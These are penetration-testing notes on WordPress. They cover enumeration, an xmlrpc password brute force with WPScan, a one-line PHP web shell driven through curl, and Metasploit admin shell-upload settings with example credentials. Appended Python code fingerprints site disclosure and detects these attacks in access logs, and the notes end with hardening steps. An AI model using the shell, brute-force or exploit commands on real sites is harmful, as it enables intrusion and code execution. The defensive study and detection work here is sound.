WordPress

Manual Enumeration

# Confirm that it is a WordPress site
curl -s http://blog.site.local | grep WordPress

# Check installed themes
curl -s http://blog.site.local/ | grep themes

# Check installed plugins
curl -s http://blog.site.local/ | grep plugins
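As an added example (not part of the original notes), the three greps above expressed as a small Python fingerprinter that a site owner can run against their own front page to see exactly which core version, theme slugs and plugin slugs the HTML discloses. The HTML sample, the host name and the plugin slugs in it are constructed; `fingerprint` and `disclosure_report` are names chosen here.

```python
import re

# Constructed sample of a WordPress front page (not captured from any real
# site); the host name is a placeholder and the plugin slugs are invented.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta name="generator" content="WordPress 5.8.2" />
<link rel="stylesheet" href="http://blog.site.local/wp-content/themes/twentynineteen/style.css?ver=1.0" />
<script src="http://blog.site.local/wp-content/plugins/example-forms/js/index.js?ver=5.5.3"></script>
<script src="http://blog.site.local/wp-content/plugins/example-gallery/lib/gallery.js"></script>
<link rel="https://api.w.org/" href="http://blog.site.local/wp-json/" />
</head><body></body></html>"""

# <meta name="generator"> carries the core version unless the site suppresses it.
GENERATOR_RE = re.compile(
    r'<meta\s+name="generator"\s+content="WordPress\s*([\d.]*)"', re.I)
# Any asset path under wp-content/themes/<slug>/ or wp-content/plugins/<slug>/.
ASSET_RE = re.compile(r'/wp-content/(themes|plugins)/([A-Za-z0-9_.-]+)/([^"\'\s>]*)')
# WordPress appends ?ver=<version> to enqueued assets; it usually equals the
# version declared in the theme or plugin header.
VER_RE = re.compile(r'[?&]ver=([\w.-]+)')


def fingerprint(html):
    """Return {'wordpress': version, 'themes': {slug: ver}, 'plugins': {slug: ver}}."""
    info = {"wordpress": None, "themes": {}, "plugins": {}}
    m = GENERATOR_RE.search(html)
    if m:
        info["wordpress"] = m.group(1) or "unknown"
    for kind, slug, rest in ASSET_RE.findall(html):
        v = VER_RE.search(rest)
        bucket = info[kind]
        # Record the slug on first sight; upgrade None to a version if a later
        # asset of the same component carries one.
        if slug not in bucket or (bucket[slug] is None and v):
            bucket[slug] = v.group(1) if v else None
    return info


def disclosure_report(html):
    """Human-readable summary of what the page leaks, for a site owner's review."""
    info = fingerprint(html)
    lines = [f"WordPress core: {info['wordpress'] or 'not disclosed'}"]
    for kind in ("themes", "plugins"):
        for slug, ver in sorted(info[kind].items()):
            lines.append(f"{kind[:-1]}: {slug} (version {ver or 'not disclosed'})")
    return lines


if __name__ == "__main__":
    # Against a live site you would fetch the page (e.g. requests.get(url).text)
    # and pass the body in instead of the constructed sample.
    print("\n".join(disclosure_report(SAMPLE_HTML)))
```

Anything this reports is visible to every anonymous visitor, so it is the list of components whose versions matter most to keep current or whose version strings you may want to stop emitting.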

WPScan

# Normal scan: enumerate users, themes and plugins (the API token adds vulnerability data from the WPScan database)
sudo wpscan --url http://blog.site.local --enumerate --api-token dEOFB<SNIP>

Attacking WordPress

Login Bruteforce

# Brute force via xmlrpc (-U user, -P wordlist, -t threads)
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.site.local

Code Execution

# One-line PHP web shell to place in a theme file on the site
<?php system($_GET[0]); ?>

# Using curl to execute commands through it
curl http://site.local/wp-content/themes/twentynineteen/404.php?0=id

# wp_admin_shell_upload uses the admin credentials to upload a shell and execute it automatically
# (rhost is an alias of rhosts, so the later set wins; VHOST supplies the Host header for the named virtual host)
> use exploit/unix/webapp/wp_admin_shell_upload
> set rhosts site.local
> set username john
> set password firebird1
> set lhost 10.10.14.15
> set rhost 10.129.42.195
> set VHOST blog.site.local
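From the defender's side, both techniques in this section leave distinctive traces in the web server access log. The following Python, added here and not part of the original notes, parses Apache combined-format lines and flags (a) sources posting repeatedly to xmlrpc.php and (b) direct requests to PHP files inside a theme directory, which WordPress itself never links to. The log lines, IP addresses, timestamps and user-agent strings are constructed, and the threshold of 5 is an assumption to tune per site.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" log format. Everything after the status code
# (bytes, referer, user agent) is left out of the regex.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A .php file addressed directly inside a theme directory.
THEME_PHP_RE = re.compile(r'^/wp-content/themes/[^/]+/.*\.php$')

# Constructed log lines: addresses come from the documentation ranges and the
# user-agent strings are invented. 198.51.100.7 plays the scanner.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "constructed-scanner/1.0"
203.0.113.9 - - [01/Jan/2024:10:05:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "constructed-mobile-app/2.1"
203.0.113.9 - - [01/Jan/2024:10:05:11 +0000] "GET / HTTP/1.1" 200 18544 "-" "Mozilla/5.0 (constructed)"
203.0.113.9 - - [01/Jan/2024:10:05:11 +0000] "GET /wp-content/themes/twentynineteen/style.css?ver=1.0 HTTP/1.1" 200 9021 "http://blog.site.local/" "Mozilla/5.0 (constructed)"
198.51.100.7 - - [01/Jan/2024:10:12:40 +0000] "GET /wp-content/themes/twentynineteen/404.php?0=id HTTP/1.1" 200 71 "-" "curl/0.0 (constructed)"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    return rec


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def detect_xmlrpc_bruteforce(records, threshold=5):
    """Sources that POST to /xmlrpc.php at least `threshold` times.

    The threshold is an assumed starting point, not a tuned value: a single
    xmlrpc request can bundle many login attempts through system.multicall,
    so a handful of POSTs already deserves a look, while a legitimate mobile
    or publishing client produces only occasional ones.
    """
    counts = Counter(r["ip"] for r in records
                     if r["method"] == "POST" and r["path"] == "/xmlrpc.php")
    return {ip: n for ip, n in counts.items() if n >= threshold}


def detect_theme_php_requests(records):
    """Direct requests to .php files under wp-content/themes/.

    WordPress includes theme templates from index.php and never links to them
    by URL, so any such request is anomalous; one carrying a query string and
    answered 200 (as with 404.php?0=id above) is the signature of an injected
    web shell being driven.
    """
    return [(r["ip"], r["target"], r["status"])
            for r in records if THEME_PHP_RE.match(r["path"])]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for ip, n in detect_xmlrpc_bruteforce(recs).items():
        print(f"xmlrpc brute force: {ip} ({n} POSTs)")
    for ip, target, status in detect_theme_php_requests(recs):
        print(f"direct theme PHP request: {ip} {target} -> {status}")
```

In production the xmlrpc count should be bucketed by time window rather than over the whole file. The corresponding hardening is short: `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the in-browser theme and plugin editor that the shell-upload path depends on, and xmlrpc.php can be blocked at the web server when no client needs it.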
